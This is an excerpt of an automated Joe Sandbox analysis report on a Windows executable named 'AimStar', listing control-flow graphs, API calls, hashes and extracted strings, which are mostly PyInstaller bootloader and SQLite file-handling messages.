                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86E1BC22F4ABA2AAFB14CB24C5402B927A5FB45BD8F054235CE0D17791DF3CE452CB64

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1484 7ff710f41210-7ff710f4126d call 7ff710f4bdf0 1487 7ff710f41297-7ff710f412af call 7ff710f54fb4 1484->1487 1488 7ff710f4126f-7ff710f41296 call 7ff710f42710 1484->1488 1493 7ff710f412b1-7ff710f412cf call 7ff710f54f78 call 7ff710f42910 1487->1493 1494 7ff710f412d4-7ff710f412e4 call 7ff710f54fb4 1487->1494 1505 7ff710f41439-7ff710f4146d call 7ff710f4bad0 call 7ff710f54fa0 * 2 1493->1505 1500 7ff710f41309-7ff710f4131b 1494->1500 1501 7ff710f412e6-7ff710f41304 call 7ff710f54f78 call 7ff710f42910 1494->1501 1504 7ff710f41320-7ff710f41345 call 7ff710f5040c 1500->1504 1501->1505 1513 7ff710f4134b-7ff710f41355 call 7ff710f50180 1504->1513 1514 7ff710f41431 1504->1514 1513->1514 1520 7ff710f4135b-7ff710f41367 1513->1520 1514->1505 1522 7ff710f41370-7ff710f41398 call 7ff710f4a230 1520->1522 1525 7ff710f4139a-7ff710f4139d 1522->1525 1526 7ff710f41416-7ff710f4142c call 7ff710f42710 1522->1526 1527 7ff710f41411 1525->1527 1528 7ff710f4139f-7ff710f413a9 1525->1528 1526->1514 1527->1526 1530 7ff710f413ab-7ff710f413b9 call 7ff710f50b4c 1528->1530 1531 7ff710f413d4-7ff710f413d7 1528->1531 1537 7ff710f413be-7ff710f413c1 1530->1537 1533 7ff710f413ea-7ff710f413ef 1531->1533 1534 7ff710f413d9-7ff710f413e7 call 7ff710f69ea0 1531->1534 1533->1522 1536 7ff710f413f5-7ff710f413f8 1533->1536 1534->1533 1539 7ff710f413fa-7ff710f413fd 1536->1539 1540 7ff710f4140c-7ff710f4140f 1536->1540 1541 7ff710f413cf-7ff710f413d2 1537->1541 1542 7ff710f413c3-7ff710f413cd call 7ff710f50180 1537->1542 1539->1526 1543 7ff710f413ff-7ff710f41407 1539->1543 1540->1514 1541->1526 1542->1533 1542->1541 1543->1504
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                          • Opcode ID: edb40a05fb2013712d537a3289a08f064389f77984c6235b46ac1bfe31ed363e
                                                                                                                                                                                                                                          • Instruction ID: c086fc86ed1e5a7eba84767f62f73d64fb4f61f4d74099aff627033b576fcd02
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: edb40a05fb2013712d537a3289a08f064389f77984c6235b46ac1bfe31ed363e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A451CF32B0CE4681EA60BB15A4027BAA299BF857A4FC44131ED4D87B95EF3CF549C320

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,00007FF710F43804), ref: 00007FF710F436E1
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF710F43804), ref: 00007FF710F436EB
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F42C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF710F43706,?,00007FF710F43804), ref: 00007FF710F42C9E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F42C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF710F43706,?,00007FF710F43804), ref: 00007FF710F42D63
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F42C50: MessageBoxW.USER32 ref: 00007FF710F42D99
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                          • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                          • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                          • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                          • Instruction ID: fd07ceef45b65797b23486e0affbb32188036ea8bc2e9e3f21e6dd08f14ffbac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A12121A1B1CD4251FA60BB20E8567BAA258BF48764FC08132DA9DC27D5EE2CF50DC760

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1786 7ff710f5bacc-7ff710f5baf2 1787 7ff710f5bb0d-7ff710f5bb11 1786->1787 1788 7ff710f5baf4-7ff710f5bb08 call 7ff710f54f58 call 7ff710f54f78 1786->1788 1789 7ff710f5bee7-7ff710f5bef3 call 7ff710f54f58 call 7ff710f54f78 1787->1789 1790 7ff710f5bb17-7ff710f5bb1e 1787->1790 1806 7ff710f5befe 1788->1806 1809 7ff710f5bef9 call 7ff710f5a950 1789->1809 1790->1789 1792 7ff710f5bb24-7ff710f5bb52 1790->1792 1792->1789 1795 7ff710f5bb58-7ff710f5bb5f 1792->1795 1798 7ff710f5bb78-7ff710f5bb7b 1795->1798 1799 7ff710f5bb61-7ff710f5bb73 call 7ff710f54f58 call 7ff710f54f78 1795->1799 1804 7ff710f5bee3-7ff710f5bee5 1798->1804 1805 7ff710f5bb81-7ff710f5bb87 1798->1805 1799->1809 1807 7ff710f5bf01-7ff710f5bf18 1804->1807 1805->1804 1810 7ff710f5bb8d-7ff710f5bb90 1805->1810 1806->1807 1809->1806 1810->1799 1813 7ff710f5bb92-7ff710f5bbb7 1810->1813 1815 7ff710f5bbea-7ff710f5bbf1 1813->1815 1816 7ff710f5bbb9-7ff710f5bbbb 1813->1816 1817 7ff710f5bbf3-7ff710f5bbff call 7ff710f5d66c 1815->1817 1818 7ff710f5bbc6-7ff710f5bbdd call 7ff710f54f58 call 7ff710f54f78 call 7ff710f5a950 1815->1818 1819 7ff710f5bbbd-7ff710f5bbc4 1816->1819 1820 7ff710f5bbe2-7ff710f5bbe8 1816->1820 1827 7ff710f5bc04-7ff710f5bc1b call 7ff710f5a9b8 * 2 1817->1827 1848 7ff710f5bd70 1818->1848 1819->1818 1819->1820 1821 7ff710f5bc68-7ff710f5bc7f 1820->1821 1825 7ff710f5bcfa-7ff710f5bd04 call 7ff710f6398c 1821->1825 1826 7ff710f5bc81-7ff710f5bc89 1821->1826 1837 7ff710f5bd8e 1825->1837 1838 7ff710f5bd0a-7ff710f5bd1f 1825->1838 1826->1825 1830 7ff710f5bc8b-7ff710f5bc8d 1826->1830 1851 7ff710f5bc1d-7ff710f5bc33 call 7ff710f54f78 call 7ff710f54f58 1827->1851 1852 7ff710f5bc38-7ff710f5bc63 call 7ff710f5c2f4 1827->1852 1830->1825 1834 7ff710f5bc8f-7ff710f5bca5 1830->1834 1834->1825 1839 7ff710f5bca7-7ff710f5bcb3 1834->1839 1841 7ff710f5bd93-7ff710f5bdb3 ReadFile 1837->1841 1838->1837 1843 7ff710f5bd21-7ff710f5bd33 GetConsoleMode 1838->1843 1839->1825 1844 7ff710f5bcb5-7ff710f5bcb7 1839->1844 1846 7ff710f5bead-7ff710f5beb6 GetLastError 1841->1846 1847 7ff710f5bdb9-7ff710f5bdc1 1841->1847 1843->1837 1849 7ff710f5bd35-7ff710f5bd3d 1843->1849 1844->1825 1850 7ff710f5bcb9-7ff710f5bcd1 1844->1850 1856 7ff710f5beb8-7ff710f5bece call 7ff710f54f78 call 7ff710f54f58 1846->1856 1857 7ff710f5bed3-7ff710f5bed6 1846->1857 1847->1846 1853 7ff710f5bdc7 1847->1853 1858 7ff710f5bd73-7ff710f5bd7d call 7ff710f5a9b8 1848->1858 1849->1841 1855 7ff710f5bd3f-7ff710f5bd61 ReadConsoleW 1849->1855 1850->1825 1859 7ff710f5bcd3-7ff710f5bcdf 1850->1859 1851->1848 1852->1821 1862 7ff710f5bdce-7ff710f5bde3 1853->1862 1864 7ff710f5bd63 GetLastError 1855->1864 1865 7ff710f5bd82-7ff710f5bd8c 1855->1865 1856->1848 1869 7ff710f5bedc-7ff710f5bede 1857->1869 1870 7ff710f5bd69-7ff710f5bd6b call 7ff710f54eec 1857->1870 1858->1807 1859->1825 1868 7ff710f5bce1-7ff710f5bce3 1859->1868 1862->1858 1872 7ff710f5bde5-7ff710f5bdf0 1862->1872 1864->1870 1865->1862 1868->1825 1876 7ff710f5bce5-7ff710f5bcf5 1868->1876 1869->1858 1870->1848 1878 7ff710f5be17-7ff710f5be1f 1872->1878 1879 7ff710f5bdf2-7ff710f5be0b call 7ff710f5b6e4 1872->1879 1876->1825 1882 7ff710f5be9b-7ff710f5bea8 call 7ff710f5b524 1878->1882 1883 7ff710f5be21-7ff710f5be33 1878->1883 1886 7ff710f5be10-7ff710f5be12 1879->1886 1882->1886 1887 7ff710f5be8e-7ff710f5be96 1883->1887 1888 7ff710f5be35 1883->1888 1886->1858 1887->1858 1890 7ff710f5be3a-7ff710f5be41 1888->1890 1891 7ff710f5be7d-7ff710f5be88 1890->1891 1892 7ff710f5be43-7ff710f5be47 1890->1892 1891->1887 1893 7ff710f5be49-7ff710f5be50 1892->1893 1894 7ff710f5be63 1892->1894 1893->1894 1896 7ff710f5be52-7ff710f5be56 1893->1896 1895 7ff710f5be69-7ff710f5be79 1894->1895 1895->1890 1897 7ff710f5be7b 1895->1897 1896->1894 1898 7ff710f5be58-7ff710f5be61 1896->1898 1897->1887 1898->1895
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
                                                                                                                                                                                                                                          • Instruction ID: e513b7bace5172dc647aefc25a027b363195179d1958c5dc7006568bbb1289f0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7C1B722A0CE8A52E751AB1594472BDB7B8EB81BA0FD54131EA4D03791CF7CF65DCB20

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                          • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                          • Opcode ID: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                                                          • Instruction ID: 6cdda9dbe1ba3b20033d58d39b451a3c8e5bbe71f606a2f617c8e0659e527b87
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C415E35A0CE8691EA11FB20E4566E9A319FB48364FC00132EE5D83795EF3CF509C3A0

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 2079 7ff8a875ffe0-7ff8a876002c 2080 7ff8a8760031-7ff8a87600a4 2079->2080 2081 7ff8a87600cb-7ff8a87600db call 7ff8a875d030 2080->2081 2082 7ff8a87600a6-7ff8a87600b5 call 7ff8a875fa20 2080->2082 2089 7ff8a87600e1-7ff8a876010a 2081->2089 2090 7ff8a87605e2-7ff8a87605e5 2081->2090 2087 7ff8a87600bb-7ff8a87600c6 2082->2087 2088 7ff8a8760647-7ff8a876066a call 7ff8a8882920 2082->2088 2087->2081 2091 7ff8a8760110-7ff8a8760125 2089->2091 2093 7ff8a87605e7-7ff8a87605ee 2090->2093 2094 7ff8a8760642 2090->2094 2101 7ff8a8760127-7ff8a8760133 2091->2101 2102 7ff8a8760162-7ff8a876016c 2091->2102 2096 7ff8a8760639 2093->2096 2097 7ff8a87605f0-7ff8a87605fa 2093->2097 2094->2088 2096->2094 2099 7ff8a87605fc 2097->2099 2100 7ff8a8760602-7ff8a876062f 2097->2100 2099->2100 2100->2094 2118 7ff8a8760631-7ff8a8760637 2100->2118 2105 7ff8a8760176-7ff8a8760191 2101->2105 2111 7ff8a8760135-7ff8a876013b 2101->2111 2104 7ff8a876016e-7ff8a8760170 2102->2104 2102->2105 2104->2105 2109 7ff8a87603b8-7ff8a87603bf 2104->2109 2106 7ff8a876019a-7ff8a87601a3 2105->2106 2107 7ff8a8760193-7ff8a8760198 2105->2107 2110 7ff8a87601a6-7ff8a87601ba call 7ff8a8816b40 2106->2110 2107->2110 2113 7ff8a876040a 2109->2113 2114 7ff8a87603c1-7ff8a87603cb 2109->2114 2126 7ff8a87601bc-7ff8a87601d6 call 7ff8a87ce010 2110->2126 2127 7ff8a87601d8 2110->2127 2116 7ff8a876013d-7ff8a8760141 2111->2116 2117 7ff8a8760143-7ff8a8760146 2111->2117 2124 7ff8a8760413 2113->2124 2119 7ff8a87603cd 2114->2119 2120 7ff8a87603d3-7ff8a8760400 2114->2120 2116->2117 2122 7ff8a876014f-7ff8a8760160 2116->2122 2117->2122 2123 7ff8a8760148-7ff8a876014d 2117->2123 2118->2094 2119->2120 2128 7ff8a876041a-7ff8a876041d 2120->2128 2140 7ff8a8760402-7ff8a8760408 2120->2140 2122->2091 2123->2105 2123->2122 2124->2128 2131 7ff8a87601da-7ff8a87601fc 2126->2131 2127->2131 2132 7ff8a876041f-7ff8a8760426 2128->2132 2133 7ff8a876047b-7ff8a8760480 2128->2133 2137 7ff8a8760200-7ff8a8760227 CreateFileW 2131->2137 2138 7ff8a8760428-7ff8a876042b 2132->2138 2139 7ff8a8760472 2132->2139 2133->2088 2141 7ff8a876022d-7ff8a876022f 2137->2141 2142 7ff8a87602d0 2137->2142 2143 7ff8a876042d 2138->2143 2144 7ff8a8760433-7ff8a8760460 2138->2144 2139->2133 2140->2124 2146 7ff8a876027f-7ff8a876028c 2141->2146 2147 7ff8a8760231-7ff8a8760243 2141->2147 2145 7ff8a87602d4-7ff8a87602d7 2142->2145 2143->2144 2144->2133 2169 7ff8a8760462-7ff8a876046d 2144->2169 2149 7ff8a87602d9-7ff8a8760302 call 7ff8a8759350 2145->2149 2150 7ff8a8760307-7ff8a876030b 2145->2150 2164 7ff8a87602cc-7ff8a87602ce 2146->2164 2165 7ff8a876028e-7ff8a8760294 2146->2165 2152 7ff8a8760245 2147->2152 2153 7ff8a8760247-7ff8a876026d call 7ff8a8760810 2147->2153 2149->2150 2156 7ff8a87604bf-7ff8a87604cd 2150->2156 2157 7ff8a8760311-7ff8a8760321 call 7ff8a8756320 2150->2157 2152->2153 2167 7ff8a876026f 2153->2167 2168 7ff8a8760271-7ff8a8760273 2153->2168 2159 7ff8a87604dd-7ff8a87604f6 call 7ff8a8756320 2156->2159 2160 7ff8a87604cf-7ff8a87604db 2156->2160 2176 7ff8a876037e-7ff8a8760383 2157->2176 2177 7ff8a8760323-7ff8a876032a 2157->2177 2180 7ff8a87604f8-7ff8a87604ff 2159->2180 2181 7ff8a8760553-7ff8a8760556 2159->2181 2160->2159 2164->2145 2171 7ff8a87602a6-7ff8a87602a9 2165->2171 2172 7ff8a8760296-7ff8a87602a4 2165->2172 2167->2168 2174 7ff8a876027b 2168->2174 2175 7ff8a8760275-7ff8a8760279 2168->2175 2169->2088 2178 7ff8a87602b2-7ff8a87602c7 2171->2178 2179 7ff8a87602ab-7ff8a87602b0 2171->2179 2172->2171 2172->2178 2174->2146 2175->2142 2175->2174 2183 7ff8a8760389-7ff8a876038e 2176->2183 2184 7ff8a8760485-7ff8a87604ba call 7ff8a875d820 call 7ff8a8815b50 2176->2184 2185 7ff8a876032c-7ff8a8760336 2177->2185 2186 7ff8a8760375 2177->2186 2178->2137 2179->2164 2179->2178 2190 7ff8a876054a 2180->2190 2191 7ff8a8760501-7ff8a876050b 2180->2191 2188 7ff8a876055d 2181->2188 2189 7ff8a8760558-7ff8a876055b 2181->2189 2183->2184 2192 7ff8a8760394-7ff8a87603b3 2183->2192 2184->2088 2194 7ff8a876033e-7ff8a876036b 2185->2194 2195 7ff8a8760338 2185->2195 2186->2176 2196 7ff8a8760564-7ff8a876057c 2188->2196 2189->2196 2190->2181 2197 7ff8a876050d 2191->2197 2198 7ff8a8760513-7ff8a8760540 2191->2198 2192->2080 2194->2176 2210 7ff8a876036d-7ff8a8760373 2194->2210 2195->2194 2201 7ff8a876057e 2196->2201 2202 7ff8a8760582-7ff8a876058a 2196->2202 2197->2198 2198->2181 2215 7ff8a8760542-7ff8a8760548 2198->2215 2201->2202 2204 7ff8a876058c-7ff8a87605a0 call 7ff8a8816b40 2202->2204 2205 7ff8a87605ba-7ff8a87605e0 2202->2205 2213 7ff8a87605b6 2204->2213 2214 7ff8a87605a2-7ff8a87605b4 call 7ff8a87ce010 2204->2214 2205->2088 2210->2176 2213->2205 2214->2205 2214->2213 2215->2181
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                          • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                                          • API String ID: 823142352-3829269058
                                                                                                                                                                                                                                          • Opcode ID: cae0b00cb7096171bd09e9f8f13f6bf005522bc53666c8e9a3692a454be1cbcc
                                                                                                                                                                                                                                          • Instruction ID: a285a24079b0e43113201f6fc1a1dbd01497a31b593ea3aed3f1d0bd9430d8a3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cae0b00cb7096171bd09e9f8f13f6bf005522bc53666c8e9a3692a454be1cbcc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E202B221F4E746AAFB649B61E85877D67A0FF85BC5F044234DD4E126A0CF3CE8848728
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010$FileRead
                                                                                                                                                                                                                                          • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                                          • API String ID: 137774199-1843600136
                                                                                                                                                                                                                                          • Opcode ID: f95efd6465811686e2e1312b352b3daf93e66d5956d10e206f7f168eed4a686f
                                                                                                                                                                                                                                          • Instruction ID: 31ea4272e5eb6bae09548c77bcf8cfe6ae6421d0a2a4db0451dfe129ae5c9f93
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f95efd6465811686e2e1312b352b3daf93e66d5956d10e206f7f168eed4a686f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31415332B0E64AAAE714CF25E8445AA7FA6FF947C4F445032EA4D43794DF3CE8428358
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279662727-0
                                                                                                                                                                                                                                          • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                          • Instruction ID: 57b0805b4dedd170d077c52c52f2dd55480e61956bb90982d794e7ba44127fe1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC41A422D1CB8183E710AB20A525369B274FB98774F508334E65C43BD1DF6CB6E8C720
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2421082833.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421034768.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
